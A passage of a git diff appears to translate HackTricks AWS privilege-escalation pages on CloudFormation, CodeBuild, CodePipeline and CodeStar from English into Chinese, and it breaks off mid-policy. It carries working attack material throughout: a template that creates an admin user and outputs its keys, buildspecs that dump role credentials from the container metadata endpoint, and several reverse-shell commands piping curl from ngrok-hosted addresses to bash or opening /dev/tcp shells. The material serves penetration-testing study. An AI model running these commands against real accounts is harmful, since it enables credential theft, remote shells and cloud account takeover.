+**潜在影响:** 提升到已附加的 cloudformation 服务角色。 ### `iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`) -An attacker could abuse these permissions to create/update StackSets to abuse arbitrary cloudformation roles. +攻击者可以滥用这些权限来创建/更新 StackSets,以滥用任意 cloudformation 角色。 -**Potential Impact:** Privesc to cloudformation service roles. +**潜在影响:** 提升到 cloudformation 服务角色。 ### `cloudformation:UpdateStackSet` -An attacker could abuse this permission without the passRole permission to update StackSets to abuse the attached cloudformation roles. +攻击者可以在没有 passRole 权限的情况下滥用此权限来更新 StackSets,以滥用附加的 cloudformation 角色。 -**Potential Impact:** Privesc to the attached cloudformation roles. +**潜在影响:** 提升到附加的 cloudformation 角色。 -## References +## 参考 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md index d41f9062c..b154ab0d5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md @@ -2,84 +2,74 @@ {{#include ../../../../banners/hacktricks-training.md}} -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - +攻击者可以使用一个**cloudformation 模板**,生成**管理员**用户的**密钥**,例如: ```json { - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description": "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": ["*"], - "Resource": "*" - } - ] - }, - "Users": [ - { - "Ref": "AdminUser" - } - ] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] - }, - "Description": "Secret Key of Admin User" - } - } +"Resources": { +"AdminUser": { +"Type": "AWS::IAM::User" +}, +"AdminPolicy": { +"Type": "AWS::IAM::ManagedPolicy", +"Properties": { +"Description": "This policy allows all actions on all resources.", +"PolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": ["*"], +"Resource": "*" +} +] +}, +"Users": [ +{ +"Ref": "AdminUser" +} +] +} +}, +"MyUserKeys": { +"Type": "AWS::IAM::AccessKey", +"Properties": { +"UserName": { +"Ref": "AdminUser" +} +} +} +}, +"Outputs": { +"AccessKey": { +"Value": { +"Ref": "MyUserKeys" +}, +"Description": "Access Key ID of Admin User" +}, +"SecretKey": { +"Value": { +"Fn::GetAtt": ["MyUserKeys", "SecretAccessKey"] +}, +"Description": "Secret Key of Admin User" +} +} } ``` - -Then **generate the cloudformation stack**: - 
+然后**生成云形成堆栈**: ```bash aws cloudformation create-stack --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 +--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ +--role arn:aws:iam::[REDACTED]:role/adminaccess \ +--capabilities CAPABILITY_IAM --region us-west-2 ``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - +**等待几分钟**以生成堆栈,然后**获取堆栈的输出**,其中**存储了凭据**: ```bash aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 +--stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ +--region uswest-2 ``` - -### References +### 参考文献 - [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index b179bec22..ae33bb59c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -4,7 +4,7 @@ ## codebuild -Get more info in: +获取更多信息: {{#ref}} ../aws-services/aws-codebuild-enum.md @@ -12,70 +12,65 @@ Get more info in: ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` -Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project: +仅凭其中一个权限就足以触发一个新的 buildspec 的构建,并窃取分配给该项目的 iam 角色的令牌: {{#tabs }} {{#tab name="StartBuild" }} - ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` - {{#endtab }} {{#tab name="StartBuildBatch" }} - ```bash cat > /tmp/buildspec.yml < --buildspec-override file:///tmp/buildspec.yml ``` - {{#endtab }} {{#endtabs }} -**Note**: The difference between these two commands is that: +**注意**:这两个命令之间的区别在于: -- `StartBuild` triggers a single build job using a specific `buildspec.yml`. -- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel). +- `StartBuild` 使用特定的 `buildspec.yml` 触发单个构建作业。 +- `StartBuildBatch` 允许您启动一批构建,具有更复杂的配置(例如并行运行多个构建)。 -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**潜在影响**:直接提升到附加的 AWS Codebuild 角色。 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one. 
+拥有 **`iam:PassRole`, `codebuild:CreateProject` 和 `codebuild:StartBuild` 或 `codebuild:StartBuildBatch`** 权限的攻击者将能够 **通过创建一个正在运行的构建来提升到任何 codebuild IAM 角色**。 {{#tabs }} {{#tab name="Example1" }} - ```bash # Enumerate then env and get creds REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" @@ -84,20 +79,20 @@ REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" JSON="{ - \"name\": \"codebuild-demo-project\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"aws/codebuild/standard:1.0\", - \"computeType\": \"BUILD_GENERAL1_SMALL\" - }, - \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +\"name\": \"codebuild-demo-project\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"aws/codebuild/standard:1.0\", +\"computeType\": \"BUILD_GENERAL1_SMALL\" +}, +\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" @@ -117,19 +112,17 @@ aws codebuild start-build --project-name codebuild-demo-project # Delete the project aws codebuild delete-project --name codebuild-demo-project ``` - {{#endtab }} -{{#tab name="Example2" }} - +{{#tab name="示例2" }} ```bash # Generated by AI, not tested # Create a buildspec.yml file with reverse shell command echo 'version: 0.2 phases: - build: - commands: - - curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml +build: +commands: +- curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash' > buildspec.yml # Upload the buildspec to the bucket and give access to everyone aws s3 cp buildspec.yml s3:/buildspec.yml @@ -141,25 +134,23 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat aws codebuild start-build --project-name reverse-shell-project ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Direct privesc to any AWS Codebuild role. +**潜在影响:** 直接提升到任何 AWS Codebuild 角色。 > [!WARNING] -> In a **Codebuild container** the file `/codebuild/output/tmp/env.sh` contains all the env vars needed to access the **metadata credentials**. +> 在 **Codebuild 容器** 中,文件 `/codebuild/output/tmp/env.sh` 包含访问 **元数据凭证** 所需的所有环境变量。 -> This file contains the **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** which contains the **URL path** to access the credentials. It will be something like this `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` +> 该文件包含 **环境变量 `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`**,其中包含访问凭证的 **URL 路径**。它将类似于 `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420` -> Add that to the URL **`http://169.254.170.2/`** and you will be able to dump the role credentials. +> 将其添加到 URL **`http://169.254.170.2/`**,您将能够转储角色凭证。 -> Moreover, it also contains the **env variable `ECS_CONTAINER_METADATA_URI`** which contains the complete URL to get **metadata info about the container**. 
+> 此外,它还包含 **环境变量 `ECS_CONTAINER_METADATA_URI`**,其中包含获取 **容器元数据** 的完整 URL。 -### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) - -Just like in the previous section, if instead of creating a build project you can modify it, you can indicate the IAM Role and steal the token +### `iam:PassRole`,`codebuild:UpdateProject`,(`codebuild:StartBuild` | `codebuild:StartBuildBatch`) +就像在前一节中一样,如果您可以修改而不是创建构建项目,您可以指示 IAM 角色并窃取令牌。 ```bash REV_PATH="/tmp/codebuild_pwn.json" @@ -171,20 +162,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash" # You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"aws/codebuild/standard:1.0\", - \"computeType\": \"BUILD_GENERAL1_SMALL\" - }, - \"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" +\"name\": \"\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"aws/codebuild/standard:1.0\", +\"computeType\": \"BUILD_GENERAL1_SMALL\" +}, +\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\" }" printf "$JSON" > $REV_PATH @@ -193,16 +184,14 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` - -**Potential Impact:** Direct privesc to any AWS Codebuild role. +**潜在影响:** 直接提升到任何 AWS Codebuild 角色。 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`) -Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**. +与前一节相似,但**没有 `iam:PassRole` 权限**,您可以利用这些权限**修改现有的 Codebuild 项目并访问它们已经分配的角色**。 {{#tabs }} {{#tab name="StartBuild" }} - ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -213,20 +202,20 @@ REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATI REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" JSON="{ - \"name\": \"\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", - \"computeType\": \"BUILD_GENERAL1_SMALL\", - \"imagePullCredentialsType\": \"CODEBUILD\" - } +\"name\": \"\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", +\"computeType\": \"BUILD_GENERAL1_SMALL\", +\"imagePullCredentialsType\": \"CODEBUILD\" +} }" # Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild! 
@@ -237,11 +226,9 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build --project-name codebuild-demo-project ``` - {{#endtab }} {{#tab name="StartBuildBatch" }} - ```sh REV_PATH="/tmp/codebuild_pwn.json" @@ -250,20 +237,20 @@ REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh" # You need to indicate the name of the project you want to modify JSON="{ - \"name\": \"project_name\", - \"source\": { - \"type\": \"NO_SOURCE\", - \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" - }, - \"artifacts\": { - \"type\": \"NO_ARTIFACTS\" - }, - \"environment\": { - \"type\": \"LINUX_CONTAINER\", - \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", - \"computeType\": \"BUILD_GENERAL1_SMALL\", - \"imagePullCredentialsType\": \"CODEBUILD\" - } +\"name\": \"project_name\", +\"source\": { +\"type\": \"NO_SOURCE\", +\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n fast-fail: false\\\\n build-list:\\\\n - identifier: build1\\\\n env:\\\\n variables:\\\\n BUILD_ID: build1\\\\n buildspec: |\\\\n version: 0.2\\\\n env:\\\\n shell: sh\\\\n phases:\\\\n build:\\\\n commands:\\\\n - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n ignore-failure: true\\\\n\" +}, +\"artifacts\": { +\"type\": \"NO_ARTIFACTS\" +}, +\"environment\": { +\"type\": \"LINUX_CONTAINER\", +\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\", +\"computeType\": \"BUILD_GENERAL1_SMALL\", +\"imagePullCredentialsType\": \"CODEBUILD\" +} }" printf "$JSON" > $REV_PATH @@ -274,41 +261,37 @@ aws codebuild update-project --cli-input-json file://$REV_PATH aws codebuild start-build-batch --project-name codebuild-demo-project ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**潜在影响:** 直接提升到附加的 AWS Codebuild 角色。 ### SSM -Having **enough permissions to start a ssm session** it's possible to get **inside a Codebuild project** being built. +拥有 **足够的权限来启动 ssm 会话**,可以进入 **正在构建的 Codebuild 项目**。 -The codebuild project will need to have a breakpoint: +Codebuild 项目需要有一个断点:
phases:
-  pre_build:
-    commands:
-      - echo Entered the pre_build phase...
-      - echo "Hello World" > /tmp/hello-world
+  pre_build:
+    commands:
+      - echo Entered the pre_build phase...
+      - echo "Hello World" > /tmp/hello-world
       - codebuild-breakpoint
 
-And then: - +然后: ```bash aws codebuild batch-get-builds --ids --region --output json aws ssm start-session --target --region ``` - -For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). +For more info [**查看文档**](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html). ### (`codebuild:StartBuild` | `codebuild:StartBuildBatch`), `s3:GetObject`, `s3:PutObject` -An attacker able to start/restart a build of a specific CodeBuild project which stores its `buildspec.yml` file on an S3 bucket the attacker has write access to, can obtain command execution in the CodeBuild process. - -Note: the escalation is relevant only if the CodeBuild worker has a different role, hopefully more privileged, than the one of the attacker. +能够启动/重启特定 CodeBuild 项目的构建的攻击者,如果该项目的 `buildspec.yml` 文件存储在攻击者具有写入权限的 S3 存储桶中,则可以在 CodeBuild 过程中获得命令执行。 +注意:只有当 CodeBuild 工作人员的角色与攻击者的角色不同时,升级才是相关的,理想情况下,工作人员的角色具有更高的权限。 ```bash aws s3 cp s3:///buildspec.yml ./ @@ -325,29 +308,22 @@ aws codebuild start-build --project-name # Wait for the reverse shell :) ``` - -You can use something like this **buildspec** to get a **reverse shell**: - +您可以使用类似这样的 **buildspec** 来获取 **reverse shell**: ```yaml:buildspec.yml version: 0.2 phases: - build: - commands: - - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 +build: +commands: +- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1 ``` - -**Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges. +**影响:** 直接提升到 AWS CodeBuild 工作人员使用的角色,该角色通常具有高权限。 > [!WARNING] -> Note that the buildspec could be expected in zip format, so an attacker would need to download, unzip, modify the `buildspec.yml` from the root directory, zip again and upload +> 请注意,buildspec 可能以 zip 格式预期,因此攻击者需要下载、解压、修改根目录中的 `buildspec.yml`,然后重新压缩并上传。 -More details could be found [here](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/). +更多详细信息可以在 [这里](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) 找到。 -**Potential Impact:** Direct privesc to attached AWS Codebuild roles. +**潜在影响:** 直接提升到附加的 AWS Codebuild 角色。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md index 0662ae9e2..c8c2c123c 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md @@ -4,7 +4,7 @@ ## codepipeline -For more info about codepipeline check: +有关 codepipeline 的更多信息,请查看: {{#ref}} ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -12,13 +12,13 @@ For more info about codepipeline check: ### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution` -When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them. +在创建代码管道时,您可以指示一个 **codepipeline IAM 角色来运行**,因此您可以妥协它们。 -Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...) +除了之前的权限,您还需要 **访问存储代码的位置**(S3、ECR、github、bitbucket...) 
-I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` +我通过在网页上进行该过程进行了测试,之前提到的权限不是创建代码管道所需的 List/Get 权限,但要在网页上创建它,您还需要:`codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:` -During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise: +在 **创建构建项目** 时,您可以指示一个 **要运行的命令**(rev shell?)并以 **特权用户** 运行构建阶段,这就是攻击者需要妥协的配置: ![](<../../../images/image (276).png>) @@ -26,16 +26,12 @@ During the **creation of the build project** you can indicate a **command to run ### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` -It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. +可能可以使用之前的权限修改所使用的角色和在代码管道上执行的命令。 ### `codepipeline:pollforjobs` -[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): +[AWS 提到](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): -> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. +> 当调用此 API 时,CodePipeline **返回用于存储管道工件的 S3 存储桶的临时凭证**,如果该操作需要访问该 S3 存储桶以获取输入或输出工件。此 API 还 **返回为该操作定义的任何秘密值**。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md index 387c6ffff..f461741ea 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md @@ -4,7 +4,7 @@ ## Codestar -You can find more information about codestar in: +您可以在以下位置找到有关codestar的更多信息: {{#ref}} codestar-createproject-codestar-associateteammember.md @@ -12,7 +12,7 @@ codestar-createproject-codestar-associateteammember.md ### `iam:PassRole`, `codestar:CreateProject` -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: +通过这些权限,您可以**滥用codestar IAM角色**通过**cloudformation模板**执行**任意操作**。请查看以下页面: {{#ref}} iam-passrole-codestar-createproject.md @@ -20,14 +20,13 @@ iam-passrole-codestar-createproject.md ### `codestar:CreateProject`, `codestar:AssociateTeamMember` -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. 
- +此技术使用`codestar:CreateProject`创建一个codestar项目,并使用`codestar:AssociateTeamMember`使IAM用户成为新CodeStar**项目**的**所有者**,这将授予他们**带有一些额外权限的新策略**。 ```bash PROJECT_NAME="supercodestar" aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME +--name $PROJECT_NAME \ +--id $PROJECT_NAME echo "Waiting 1min to start the project" sleep 60 @@ -35,15 +34,14 @@ sleep 60 USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed +--project-id $PROJECT_NAME \ +--user-arn "$USER_ARN" \ +--project-role "Owner" \ +--remote-access-allowed ``` +如果您已经是**项目的成员**,您可以使用权限**`codestar:UpdateTeamMember`**将**您的角色**更新为所有者,而不是`codestar:AssociateTeamMember`。 -If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` - -**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: +**潜在影响:** 提升到生成的codestar策略。您可以在以下位置找到该策略的示例: {{#ref}} codestar-createproject-codestar-associateteammember.md @@ -51,27 +49,23 @@ codestar-createproject-codestar-associateteammember.md ### `codestar:CreateProjectFromTemplate` -1. **Create a New Project:** - - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - - This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - - With the granted CloudFormation permissions, proceed to update the specified stack. - - The stack's name will typically conform to one of two patterns: - - `awscodestar--infrastructure` - - `awscodestar--lambda` - - The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. +1. **创建新项目:** +- 利用**`codestar:CreateProjectFromTemplate`**操作来启动新项目的创建。 +- 成功创建后,自动授予**`cloudformation:UpdateStack`**的访问权限。 +- 此访问权限专门针对与`CodeStarWorker--CloudFormation` IAM角色相关联的堆栈。 +2. **更新目标堆栈:** +- 使用授予的CloudFormation权限,继续更新指定的堆栈。 +- 堆栈的名称通常符合以下两种模式之一: +- `awscodestar--infrastructure` +- `awscodestar--lambda` +- 确切名称取决于所选模板(参考示例利用脚本)。 +3. 
**访问和权限:** +- 更新后,您获得与堆栈关联的**CloudFormation IAM角色**分配的能力。 +- 注意:这并不固有地提供完全的管理员权限。可能需要环境中其他配置错误的资源来进一步提升权限。 -For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ -You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) +有关更多信息,请查看原始研究:[https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/)。\ +您可以在[https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)找到利用代码。 -**Potential Impact:** Privesc to cloudformation IAM role. +**潜在影响:** 提升到cloudformation IAM角色。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md index 0de95738e..d1c003bbf 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md @@ -2,84 +2,78 @@ {{#include ../../../../banners/hacktricks-training.md}} -This is the created policy the user can privesc to (the project name was `supercodestar`): - +这是用户可以提升权限的创建策略(项目名称为 `supercodestar`): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": ["*"] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - 
